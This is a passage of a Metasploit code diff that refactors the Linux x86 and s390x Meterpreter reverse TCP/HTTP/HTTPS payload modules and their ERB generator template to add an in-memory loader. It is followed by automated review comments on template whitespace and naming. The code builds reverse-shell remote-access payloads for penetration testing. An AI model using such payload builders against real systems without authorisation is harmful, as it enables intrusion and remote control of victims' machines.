@@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 05378c8201..7ca088eab3 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index cd64973d09..8d6eda6b7c 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Zarch::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 9353c46bc9..fbdf407935 100644 
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Zarch::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 6305aa40ca..570b13eef6 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1332048 
@@ -16,28 +17,28 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_ZARCH, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_zarch_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_ZARCH, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_zarch_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/tools/modules/meterpreter_reverse.erb b/tools/modules/meterpreter_reverse.erb index 8e012f795f..975ee14ce8 100644 --- a/tools/modules/meterpreter_reverse.erb +++ b/tools/modules/meterpreter_reverse.erb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::<%= platform.split('_').each { |s| s.casecmp?('osx') ? 'OSX' : s.capitalize! }.join %> include Msf::Sessions::MettleConfig + <% if platform.downcase == 'linux' %>include Msf::Payload::Linux::<%= arch.capitalize %>::MeterpreterLoader<% end %> def initialize(info = {}) super( 
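Review bot: The new include line in tools/modules/meterpreter_reverse.erb is emitted for every Linux arch the generator handles, with the constant built from `arch.capitalize`, so it only resolves when a `Msf::Payload::Linux::<Arch>::MeterpreterLoader` module exists under exactly that capitalisation for each arch. The diffstat shows the ppc, ppc64le and ppce500v2 loaders renamed but no regenerated ppc modules, so it is worth checking that the checked-in modules and the generator output still agree for those arches. For non-Linux platforms the line appears to render as indentation only, leaving trailing whitespace in the generated module. Putting the indentation inside the conditional (`<% if platform.downcase == 'linux' %>  include …<% end %>`) would avoid that. The enclosing module body continues outside the hunk.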
@@ -36,6 +37,7 @@ module MetasploitModule scheme: '<%= scheme %>', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec + <% if platform.downcase == 'linux' %>in_memory_load(payload) + <% end %>payload end end
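Review bot: The added lines use `payload` for two different things: inside `<%= payload %>` it is the template variable holding the Mettle target triple, while the bare `payload` is a local in the generated module holding the binary. A short ERB comment would spare the next editor the double take, e.g. `<%# ERB 'payload' = target triple; Ruby 'payload' = generated binary %>`. The conditional is also spliced mid-expression (`<% end %>payload`), which makes the non-Linux output depend on exact tag whitespace; emitting the two complete return lines from an if/else would read more plainly. The enclosing `generate` starts outside the hunk.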